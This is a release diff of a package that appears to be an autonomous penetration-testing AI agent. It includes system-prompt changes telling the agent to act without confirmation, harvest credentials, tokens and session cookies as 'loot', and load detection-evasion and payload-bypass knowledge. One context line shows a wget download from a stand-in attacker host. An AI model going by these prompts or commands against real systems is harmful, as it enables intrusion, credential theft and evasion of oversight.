pentesting 0.48.2 → 0.48.3

package/README.md

@@ -33,18 +33,6 @@ Pentesting support tool
 
 ## Quick Start with Docker (Recommended)
 
-
-```bash
-docker run -it --rm \
-  -e PENTEST_API_KEY="your_glm_api_key" \
-  -e PENTEST_BASE_URL="https://open.bigmodel.cn/api/paas/v4" \
-  -e PENTEST_MODEL="glm-5" \
-  -v ./pentest-data:/root/.pentest \
-  agnusdei1207/pentesting
-```
-
-### Using Brave Search
-
 ```bash
 docker run -it --rm \
   -e PENTEST_API_KEY="your_glm_api_key" \

package/dist/main.js

@@ -331,7 +331,7 @@ var ORPHAN_PROCESS_NAMES = [
 
 // src/shared/constants/agent.ts
 var APP_NAME = "Pentest AI";
-var APP_VERSION = "0.48.2";
+var APP_VERSION = "0.48.3";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var LLM_ROLES = {
   SYSTEM: "system",
@@ -10770,6 +10770,30 @@ RULES:
         this.state.addLoot({ type: LOOT_TYPES.CREDENTIAL, host: "auto-extracted", detail: cred, obtainedAt: Date.now() });
       }
     }
+    if (digestResult?.memo?.attackVectors.length && digestResult.memo.attackValue === "HIGH") {
+      const existingTitles = new Set(this.state.getFindings().map((f) => f.title));
+      for (const vector of digestResult.memo.attackVectors) {
+        const title = `[Auto] ${vector.slice(0, 100)}`;
+        if (!existingTitles.has(title)) {
+          this.state.addFinding({
+            id: generateId(),
+            title,
+            severity: "high",
+            affected: [],
+            description: `Auto-extracted by Analyst LLM: ${vector}`,
+            evidence: digestResult.memo.keyFindings.slice(0, 5),
+            isVerified: false,
+            remediation: "",
+            foundAt: Date.now()
+          });
+          this.state.attackGraph.addVulnerability(title, "auto-detected", "high", false);
+          existingTitles.add(title);
+        }
+      }
+    }
+    if (this.state.getFindings().length > 0 && this.state.getPhase() === PHASES.RECON) {
+      this.state.setPhase(PHASES.VULN_ANALYSIS);
+    }
   }
   /**
    * Enrich tool error — delegates to extracted module (§3-1)
@@ -11360,8 +11384,14 @@ var CORE_KNOWLEDGE_FILES = [
   // Attack prioritization, first-turn protocol, upgrade loop
   AGENT_FILES.ORCHESTRATOR,
   // Phase transitions, multi-target management
-  AGENT_FILES.EVASION
+  AGENT_FILES.EVASION,
   // Detection avoidance (always relevant)
+  AGENT_FILES.ZERO_DAY,
+  // Known CVE lookup + unknown vuln discovery methodology
+  AGENT_FILES.PAYLOAD_CRAFT,
+  // Payload mutation and filter bypass techniques
+  AGENT_FILES.INFRA
+  // Active Directory / infrastructure attack methodology
 ];
 var PHASE_TECHNIQUE_MAP = {
   [PHASES.RECON]: ["network-svc", "shells", "crypto"],

package/dist/prompts/base.md

@@ -115,11 +115,41 @@ bg_process({ action: "interact", command: "wget http://attacker/file -O /tmp/fil
 
 ### 1. Act, Don't Ask
 - ScopeGuard enforces boundaries. Out-of-scope targets are automatically blocked
-- Record findings immediately with add_finding
 - **Execute tasks immediately without unnecessary confirmations/questions**
 - If no results → **try a different approach** (never repeat the same method)
 - ask_user is for: (1) physically unobtainable information (passwords, SSH keys, API tokens), (2) **confirming you're truly done** when all vectors are exhausted
 
+### 🔴 CRITICAL: State Management — MANDATORY AFTER EVERY DISCOVERY
+
+**You MUST call these tools to record your progress. If you skip these, your findings are LOST.**
+
+**`add_finding`** — Call IMMEDIATELY when you **CONFIRM** a vulnerability:
+- Confirmed LFI/RFI → `add_finding` with evidence (the actual command output)
+- Confirmed SQLi → `add_finding` with evidence
+- Confirmed RCE → `add_finding` with evidence  
+- Confirmed auth bypass → `add_finding` with evidence
+- **Rule: If you can reproduce it, it's a confirmed finding. Record it NOW.**
+
+**`add_target`** — Call when you discover a new host or service:
+- New IP found during recon → `add_target`
+- New ports/services discovered → `add_target` (merges with existing)
+
+**`add_loot`** — Call when you find credentials, tokens, keys, hashes:
+- Password, hash, API key, SSH key, JWT, session cookie → `add_loot`
+
+**`update_phase`** — Call when your ACTIVITY changes:
+- Scanning/enumerating services → `update_phase({ phase: "recon" })`
+- Testing for vulnerabilities → `update_phase({ phase: "vulnerability_analysis" })`
+- Exploiting confirmed vulns → `update_phase({ phase: "exploit" })`
+- Post-access enumeration → `update_phase({ phase: "post_exploitation" })`
+- Escalating privileges → `update_phase({ phase: "privilege_escalation" })`
+- Moving to other hosts → `update_phase({ phase: "lateral_movement" })`
+
+⚠️ **Self-Check Every Turn:**
+- "Did I confirm a vulnerability but NOT call `add_finding`?" → Call it NOW
+- "Am I exploiting but Phase is still 'recon'?" → Call `update_phase` NOW
+- "Did I find credentials but NOT call `add_loot`?" → Call it NOW
+
 ### 2. ask_user Rules
 - Use received values **immediately in the next command** — receiving and not using is forbidden
 - Once received → **reuse** — never ask for the same thing again

package/dist/prompts/strategy.md

@@ -620,7 +620,7 @@ Layer 2 — Structural Reduction (cost: ~1ms)
 Layer 3 — Semantic Digest (cost: ~2-5s, separate LLM call)
   Only fires for truly massive outputs (>50K after Layer 1+2).
   Produces a focused 30-line intelligence summary.
-  Full output is ALWAYS saved to ~/.pentesting/outputs/ for reference.
+  Full output is ALWAYS saved to .pentesting/outputs/ for reference.
 ```
 
 ### Agent Behavioral Rules for Output Handling

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.48.2",
+  "version": "0.48.3",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",